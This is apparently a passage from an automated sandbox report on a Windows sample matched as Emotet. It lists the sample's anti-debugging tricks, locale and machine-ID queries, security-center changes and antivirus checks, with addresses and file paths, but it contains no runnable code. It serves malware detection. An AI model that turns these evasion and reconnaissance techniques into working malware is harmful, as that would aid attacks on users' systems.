Source: svchost.exe, 00000006.00000002.481994541.000001F95C402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.488445142.0000027E35655000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA, 0_2_00402770
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02634E10 mov eax, dword ptr fs:[00000030h] 0_2_02634E10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633F70 mov eax, dword ptr fs:[00000030h] 0_2_02633F70
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02125B0E mov eax, dword ptr fs:[00000030h] 0_2_02125B0E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02120456 mov eax, dword ptr fs:[00000030h] 0_2_02120456
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0212095E mov eax, dword ptr fs:[00000030h] 0_2_0212095E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_021269AE mov eax, dword ptr fs:[00000030h] 0_2_021269AE
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_025E1030 mov eax, dword ptr fs:[00000030h] 0_2_025E1030
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02174E10 mov eax, dword ptr fs:[00000030h] 3_2_02174E10
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_02173F70 mov eax, dword ptr fs:[00000030h] 3_2_02173F70
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_020E1030 mov eax, dword ptr fs:[00000030h] 3_2_020E1030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_02633A10
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FBA SetUnhandledExceptionFilter, 0_2_00409FBA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00409FCE SetUnhandledExceptionFilter, 0_2_00409FCE
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00409FBA SetUnhandledExceptionFilter, 3_2_00409FBA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: 3_2_00409FCE SetUnhandledExceptionFilter, 3_2_00409FCE
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progman
Source: dot3hc.exe, 00000003.00000002.483551801.0000000000CD0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.484518801.00000212DA190000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040CC72
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F81E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 0_2_0040F8DA
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 0_2_0040F94E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 0_2_0040D1C8
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D191
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: _strlen,EnumSystemLocalesA, 0_2_0040D24E
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 0_2_0040FA01
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA, 0_2_0040D6A0
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 0_2_0040D2A3
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA, 3_2_0040CC72
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 3_2_0040F81E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 3_2_0040F8DA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 3_2_0040F94E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 3_2_0040D1C8
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,EnumSystemLocalesA, 3_2_0040D191
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: _strlen,EnumSystemLocalesA, 3_2_0040D24E
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 3_2_0040FA01
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA, 3_2_0040D6A0
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 3_2_0040D2A3
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_0040B346 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_0040B346
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe Code function: 0_2_00405A89 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,GetModuleHandleA, 0_2_00405A89
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.482370944.0000015D08A40000.00000004.00000001.sdmp Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482473303.0000015D08B02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE